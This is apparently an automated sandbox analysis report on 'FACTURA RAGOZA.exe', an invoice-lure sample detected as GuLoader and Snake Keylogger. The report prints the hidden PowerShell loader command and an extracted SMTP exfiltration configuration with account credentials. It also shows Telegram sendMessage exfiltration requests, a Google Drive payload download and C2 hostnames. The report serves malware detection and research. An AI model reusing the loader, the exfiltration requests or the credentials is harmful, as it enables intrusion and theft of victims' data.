Edit tour

Windows Analysis Report
FACTURA RAGOZA.exe

Overview

General Information

Sample name:	FACTURA RAGOZA.exe
Analysis ID:	1538485
MD5:	8b7d3863a10666b5b4fca4230c413755
SHA1:	1125d82c42bb40664961ee5b57d29da65cd300b0
SHA256:	7c4a22d1264cf34a71cce344a1a5e38bbe50ab5bf7bd560d98e04759c1bd6029
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

FACTURA RAGOZA.exe (PID: 5936 cmdline: "C:\Users\user\Desktop\FACTURA RAGOZA.exe" MD5: 8B7D3863A10666B5B4FCA4230C413755)

powershell.exe (PID: 5808 cmdline: "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7552 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "exploitation@hsbcargo.com", "Password": "HSBcargo_22", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2248410739.000000000A4E6000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7552	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7552	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.186.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7552, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 54072

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5808, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer\FACTURA RAGOZA.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)", CommandLine: "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FACTURA RAGOZA.exe", ParentImage: C:\Users\user\Desktop\FACTURA RAGOZA.exe, ParentProcessId: 5936, ParentProcessName: FACTURA RAGOZA.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)", ProcessId: 5808, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:57:07.359299+0200	2803305	3	Unknown Traffic	192.168.2.4	54121	188.114.97.3	443	TCP
2024-10-21T11:57:10.128941+0200	2803305	3	Unknown Traffic	192.168.2.4	54140	188.114.97.3	443	TCP
2024-10-21T11:57:13.158285+0200	2803305	3	Unknown Traffic	192.168.2.4	54160	188.114.97.3	443	TCP
2024-10-21T11:57:16.073769+0200	2803305	3	Unknown Traffic	192.168.2.4	54181	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:57:05.416589+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	54107	158.101.44.242	80	TCP
2024-10-21T11:57:06.651000+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	54107	158.101.44.242	80	TCP
2024-10-21T11:57:08.057252+0200	2803274	2	Potentially Bad Traffic	192.168.2.4	54126	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-21T11:56:59.602497+0200	2803270	2	Potentially Bad Traffic	192.168.2.4	54072	142.250.186.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "exploitation@hsbcargo.com", "Password": "HSBcargo_22", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: FACTURA RAGOZA.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:54115 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.4:54072 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.4:54083 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:54194 version: TLS 1.2

Source: FACTURA RAGOZA.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbf< source: powershell.exe, 00000001.00000002.2247451414.0000000008653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbEPY; source: powershell.exe, 00000001.00000002.2247541726.00000000086D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5L source: powershell.exe, 00000001.00000002.2247510230.0000000008693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb9 source: powershell.exe, 00000001.00000002.2241151910.0000000007374000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdbmjY source: powershell.exe, 00000001.00000002.2247541726.00000000086D4000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_00406033 FindFirstFileA,FindClose,	0_2_00406033
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055D1
Source: C:\Users\user\Desktop\FACTURA RAGOZA.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0047F45Dh	6_2_0047F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0047F45Dh	6_2_0047F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0047FC19h	6_2_0047F974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C30D0Dh	6_2_23C30B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C31697h	6_2_23C30B30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C331E0h	6_2_23C32DC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C32C19h	6_2_23C32968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3F661h	6_2_23C3F3B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3F209h	6_2_23C3EF60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3EDB1h	6_2_23C3EB08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3E959h	6_2_23C3E6B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3E501h	6_2_23C3E258
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3E0A9h	6_2_23C3DE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3DC51h	6_2_23C3D9A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C331E0h	6_2_23C32DBF
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3D7F9h	6_2_23C3D550
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C331E0h	6_2_23C3310E
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3D3A1h	6_2_23C3D0F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3CF49h	6_2_23C3CCA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	6_2_23C30040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23C3FAB9h	6_2_23C3F810

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2021/10/2024%20/%2020:10:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:54126 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:54107 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:54140 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:54121 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:54181 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:54072 -> 142.250.186.174:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:54160 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:54115 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2021/10/2024%20/%2020:10:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:57:19 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.2241151910.0000000007374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: FACTURA RAGOZA.exe, FACTURA RAGOZA.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: FACTURA RAGOZA.exe, FACTURA RAGOZA.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2239317832.0000000005F1A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2235935141.0000000005006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2235935141.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2235935141.0000000005006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2235935141.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2940688123.0000000023D44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.2354778791.0000000000701000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2354936723.000000000073C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.2942294889.0000000024F29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
